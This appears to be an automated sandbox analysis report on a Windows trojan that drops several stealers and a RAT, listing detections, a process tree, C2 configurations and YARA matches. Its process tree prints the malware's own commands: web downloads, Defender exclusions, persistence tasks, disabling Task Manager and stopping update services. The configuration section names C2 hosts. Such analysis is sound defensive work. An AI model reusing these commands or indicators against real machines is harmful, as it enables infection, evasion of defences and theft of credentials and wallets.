Edit tour

Windows Analysis Report
hsRju5CPK2.exe

Overview

General Information

Sample name:	hsRju5CPK2.exe renamed because original name is a hash value
Original sample name:	e77913dfeb423031e19acbd2460dffea.exe
Analysis ID:	1461336
MD5:	e77913dfeb423031e19acbd2460dffea
SHA1:	505930c0fb84b2cff347020a4f06d4cb87a1cd07
SHA256:	ac678b7f487381cbb608c2ae21747297e1090114e6907c7070f578e84bceb824
Tags:	32exetrojan
Infos:

Detection

LummaC, Amadey, LummaC Stealer, PureLog Stealer, RedLine, zgRAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Detected unpacking (changes PE section rights)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Disable power options

Sigma detected: Powershell downloading file from url shortener site

Snort IDS alert for network traffic

Yara detected Amadey

Yara detected Amadeys stealer DLL

Yara detected LummaC Stealer

Yara detected PureLog Stealer

Yara detected RedLine Stealer

Yara detected zgRAT

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Connects to many ports of the same IP (likely port scanning)

Contains functionality to inject code into remote processes

Disable Task Manager(disabletaskmgr)

Disables the Windows task manager (taskmgr)

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

LummaC encrypted strings found

Machine Learning detection for dropped file

Machine Learning detection for sample

Modifies power options to not sleep / hibernate

PE file contains section with special chars

Performs DNS queries to domains with low reputation

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sample uses string decryption to hide its real strings

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: Suspicious Invoke-WebRequest Execution

Sigma detected: Suspicious Script Execution From Temp Folder

Suspicious powershell command line found

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Crypto Currency Wallets

Uses cmd line tools excessively to alter registry or file data

Uses powercfg.exe to modify the power settings

Uses schtasks.exe or at.exe to add and modify task schedules

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks for debuggers (devices)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates job files (autostart)

Detected TCP or UDP traffic on non-standard ports

Detected non-DNS traffic on DNS port

Detected potential crypto function

Detected suspicious crossdomain redirect

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Enables debug privileges

Enables security privileges

Entry point lies outside standard sections

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain (date check)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Installs a raw input device (often for capturing keystrokes)

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

One or more processes crash

PE file contains an invalid checksum

PE file contains executable resources (Code or Archives)

PE file contains more sections than normal

PE file contains sections with non-standard names

PE file overlay found

Queries disk information (often used to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: PowerShell Web Download

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Schtasks From Env Var Folder

Sigma detected: Usage Of Web Request Commands And Cmdlets

Stores files to the Windows start menu directory

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Uses reg.exe to modify the Windows registry

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

hsRju5CPK2.exe (PID: 6348 cmdline: "C:\Users\user\Desktop\hsRju5CPK2.exe" MD5: E77913DFEB423031E19ACBD2460DFFEA)

axplong.exe (PID: 6024 cmdline: "C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe" MD5: E77913DFEB423031E19ACBD2460DFFEA)

ama.exe (PID: 6200 cmdline: "C:\Users\user\AppData\Local\Temp\1000007001\ama.exe" MD5: 5D860E52BFA60FEC84B6A46661B45246)

gold.exe (PID: 3608 cmdline: "C:\Users\user\AppData\Local\Temp\1000035001\gold.exe" MD5: 70A578F7F58456E475FACD69469CF20A)

RegAsm.exe (PID: 6340 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

RegAsm.exe (PID: 6332 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

lummac2.exe (PID: 5064 cmdline: "C:\Users\user\AppData\Local\Temp\1000047001\lummac2.exe" MD5: 6E3D83935C7A0810F75DFA9BADC3F199)

Installer.exe (PID: 6208 cmdline: "C:\Users\user\AppData\Local\Temp\1000091001\Installer.exe" MD5: 5F331887BEC34F51CCA7EA78815621F7)

cmd.exe (PID: 2472 cmdline: cmd /c ins.bat MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 4612 cmdline: schtasks.exe /create /SC MINUTE /MO 10 /TN "CCleaner" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" http://starjod.xyz/Website.php" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 5232 cmdline: schtasks.exe /create /SC MINUTE /MO 11 /TN "Updater" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" http://starjod.xyz/Website.php" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

powershell.exe (PID: 6152 cmdline: powershell -Command "Invoke-WebRequest -Uri 'https://bit.ly/4c7L8Zs' -UseBasicParsing >$null" MD5: 04029E121A0CFA5991749937DD22A1D9)

powershell.exe (PID: 7820 cmdline: powershell -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\install.bat' -Verb runAs -WindowStyle Hidden" MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 7296 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\install.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 4148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 4836 cmdline: schtasks /create /tn "Cleaner" /tr "C:\Users\user\AppData\Local\Corporation\File\RemoteExecuteScriptSilent.exe" /sc onstart /delay 0005:00 MD5: 76CD6626DD8834BD4A42E6A565104DC2)

reg.exe (PID: 5776 cmdline: reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /f /v DisableTaskMgr /t REG_DWORD /d 00000001 MD5: 227F63E1D9008B36BDBCC4B397780BE4)

schtasks.exe (PID: 7416 cmdline: schtasks.exe /create /SC MINUTE /MO 10 /TN "CCleaner" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" http://starjod.xyz/Website.php" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7412 cmdline: schtasks.exe /create /SC MINUTE /MO 11 /TN "Updater" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" http://starjod.xyz/Website.php" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)

powershell.exe (PID: 5044 cmdline: powershell -Command "Invoke-WebRequest -Uri 'https://github.com/frielandrews892/File/releases/download/File/File.zip' -OutFile 'C:\Users\user\AppData\Local\Corporation.zip'" MD5: 04029E121A0CFA5991749937DD22A1D9)

legs.exe (PID: 3136 cmdline: "C:\Users\user\AppData\Local\Temp\1000092001\legs.exe" MD5: BBD06263062B2C536B5CAACDD5F81B76)

RegAsm.exe (PID: 6976 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

RegAsm.exe (PID: 2820 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

conhost.exe (PID: 2448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WerFault.exe (PID: 7248 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3136 -s 264 MD5: C31336C1EFC2CCB44B4326EA793040F2)

taskweaker.exe (PID: 8156 cmdline: "C:\Users\user\AppData\Local\Temp\1000094001\taskweaker.exe" MD5: 6C149B39619395A8BA117A4CAE95BA6F)

axplong.exe (PID: 2260 cmdline: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe MD5: E77913DFEB423031E19ACBD2460DFFEA)

NewLatest.exe (PID: 1988 cmdline: "C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe" MD5: 07101CAC5B9477BA636CD8CA7B9932CB)

Hkbsse.exe (PID: 3664 cmdline: "C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe" MD5: 07101CAC5B9477BA636CD8CA7B9932CB)

FirstZ.exe (PID: 7576 cmdline: "C:\Users\user\AppData\Local\Temp\1000015001\FirstZ.exe" MD5: FFADA57F998ED6A72B6BA2F072D2690A)

powershell.exe (PID: 7592 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7604 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 1988 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

cmd.exe (PID: 4276 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

wusa.exe (PID: 2972 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)

sc.exe (PID: 5776 cmdline: C:\Windows\system32\sc.exe stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 7416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 7672 cmdline: C:\Windows\system32\sc.exe stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 7688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 5392 cmdline: C:\Windows\system32\sc.exe stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 2124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 1252 cmdline: C:\Windows\system32\sc.exe stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 7416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 1100 cmdline: C:\Windows\system32\sc.exe stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 5176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powercfg.exe (PID: 7604 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)

conhost.exe (PID: 7624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powercfg.exe (PID: 5392 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)

Hkbsse.exe (PID: 3276 cmdline: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe MD5: 07101CAC5B9477BA636CD8CA7B9932CB)

chrome.exe (PID: 2884 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" http://starjod.xyz/Website.php MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 8128 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2092 --field-trial-handle=1976,i,13008057161343220157,61792312660998642,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 3680 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" http://starjod.xyz/Website.php MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 8108 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2104 --field-trial-handle=1844,i,8972611737897508834,4615011947215389574,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

svchost.exe (PID: 5952 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

WerFault.exe (PID: 7208 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 3136 -ip 3136 MD5: C31336C1EFC2CCB44B4326EA793040F2)

svchost.exe (PID: 7280 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 7400 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1972 cmdline: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://darktrace.com/blog/the-rise-of-the-lumma-info-stealer https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-lummac2-94111d4b1e11	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Name	Description	Attribution	Blogpost URLs	Link
Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://asec.ahnlab.com/en/36634/ https://asec.ahnlab.com/en/41450/ https://asec.ahnlab.com/en/44504/ https://bitsight.com/blog/unveiling-socks5systemz-rise-new-proxy-service-privateloader-and-amadey	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name	Description	Attribution	Blogpost URLs	Link
RedLine Stealer	RedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://apophis133.medium.com/redline-technical-analysis-report-5034e16ad152 https://asec.ahnlab.com/en/30445/ https://asec.ahnlab.com/en/35981/ https://asec.ahnlab.com/ko/25837/	https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Name	Description	Attribution	Blogpost URLs	Link
zgRAT	zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.	No Attribution	https://bazaar.abuse.ch/browse/signature/zgRAT/ https://kcm.trellix.com/corporate/index?page=content&id=KB96190&locale=en_US https://www.cloudsek.com/blog/threat-actors-abuse-ai-generated-youtube-videos-to-spread-stealer-malware https://www.difesaesicurezza.com/cyber/cybercrime-rfq-dalla-turchia-veicola-agenttesla-e-zgrat/ https://www.fortinet.com/blog/threat-research/smokeloader-using-old-vulnerabilities	https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: LummaC

{"C2 url": ["barebrilliancedkoso.shop", "parallelmercywksoffw.shop", "ohfantasyproclaiwlo.shop", "landdumpycolorwskfw.shop", "flourhishdiscovrw.shop", "conferencefreckewl.shop", "notoriousdcellkw.shop", "liabiliytshareodlkv.shop", "liabiliytshareodlkv.shop", "barebrilliancedkoso.shop", "parallelmercywksoffw.shop", "ohfantasyproclaiwlo.shop", "landdumpycolorwskfw.shop", "flourhishdiscovrw.shop", "conferencefreckewl.shop", "notoriousdcellkw.shop", "liabiliytshareodlkv.shop", "liabiliytshareodlkv.shop", "barebrilliancedkoso.shop", "parallelmercywksoffw.shop", "ohfantasyproclaiwlo.shop", "landdumpycolorwskfw.shop", "flourhishdiscovrw.shop", "conferencefreckewl.shop", "notoriousdcellkw.shop", "liabiliytshareodlkv.shop", "liabiliytshareodlkv.shop"], "Build id": "LGNDR1--"}

Threatname: Amadey

{"C2 url": "185.172.128.116/Mb3GvQs8/index.php", "Version": "4.30"}

Threatname: RedLine

{"C2 url": "4.185.27.237:13528", "Bot Id": "LiveTraffic", "Message": "Error disable antivirus and try again", "Authorization Header": "143feb5082f9936e624c1e27545e7d19"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author
dump.pcap	JoeSecurity_RedLine_1	Yara detected RedLine Stealer	Joe Security
dump.pcap	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Dropped Files

Source	Rule	Description	Author
C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\ama[1].exe	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\NewLatest[1].exe	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000002.00000003.2050132047.0000000004EB0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000000.00000002.2055170798.0000000000AD1000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000004.00000000.2084249217.0000000000352000.00000002.00000001.01000000.00000009.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000002.00000002.4489470603.0000000000CF1000.00000040.00000001.01000000.00000007.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000005.00000002.2108280020.0000000000A13000.00000004.00000001.01000000.0000000B.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000007.00000002.4488518104.0000000000421000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0000000C.00000000.2181187117.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000000C.00000002.2191932184.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000000.00000003.2014834616.00000000051E0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000017.00000002.2253029783.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000B.00000000.2176704123.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000015.00000002.2422340498.0000000000CF5000.00000004.00000001.01000000.00000011.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000024.00000003.2381126293.000000C000B58000.00000004.00001000.00020000.00000000.sdmp	Msfpayloads_msf_9	Metasploit Payloads - file msf.war - contents	Florian Roth	0x0:$x1: 4d5a9000030000000
0000000B.00000002.4489420216.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000003.00000003.2053395670.0000000004E80000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000024.00000003.2493890877.000000C000B58000.00000004.00001000.00020000.00000000.sdmp	Msfpayloads_msf_9	Metasploit Payloads - file msf.war - contents	Florian Roth	0x0:$x1: 4d5a9000030000000
00000024.00000003.2443773184.000000C000B58000.00000004.00001000.00020000.00000000.sdmp	Msfpayloads_msf_9	Metasploit Payloads - file msf.war - contents	Florian Roth	0x0:$x1: 4d5a9000030000000
00000003.00000002.2095100146.0000000000CF1000.00000040.00000001.01000000.00000007.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000009.00000000.2162518369.00000000000D1000.00000020.00000001.01000000.0000000D.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000009.00000002.2177727699.00000000000D1000.00000020.00000001.01000000.0000000D.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000004.00000002.2393678580.0000000002970000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: ama.exe PID: 6200	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: ama.exe PID: 6200	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: gold.exe PID: 3608	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 6332	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
decrypted.memstr	JoeSecurity_Amadey_4	Yara detected Amadey	Joe Security
Click to see the 23 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
7.2.RegAsm.exe.400000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
12.2.Hkbsse.exe.b90000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
21.2.legs.exe.cc0000.0.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
21.2.legs.exe.cc0000.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
21.2.legs.exe.cc0000.0.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x7968d:$s1: file:/// 0x795e9:$s2: {11111-22222-10009-11112} 0x7961d:$s3: {11111-22222-50001-00000} 0x764d1:$s4: get_Module 0x70cdb:$s5: Reverse 0x71a5f:$s6: BlockCopy 0x70ca9:$s7: ReadByte 0x7969f:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
23.2.RegAsm.exe.400000.0.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
23.2.RegAsm.exe.400000.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
23.2.RegAsm.exe.400000.0.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x4564d:$s1: file:/// 0x455a9:$s2: {11111-22222-10009-11112} 0x455dd:$s3: {11111-22222-50001-00000} 0x42491:$s4: get_Module 0x3cc9b:$s5: Reverse 0x3da1f:$s6: BlockCopy 0x3cc69:$s7: ReadByte 0x4565f:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
9.0.NewLatest.exe.d0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
5.2.gold.exe.9e0000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
12.0.Hkbsse.exe.b90000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
2.2.axplong.exe.cf0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
11.0.Hkbsse.exe.b90000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
9.2.NewLatest.exe.d0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
11.2.Hkbsse.exe.b90000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
4.0.ama.exe.350000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
3.2.axplong.exe.cf0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0.2.hsRju5CPK2.exe.ad0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
Click to see the 13 entries

Sigma Signatures

Change of critical system settings

Sigma detected: Disable power options

Source: Process started

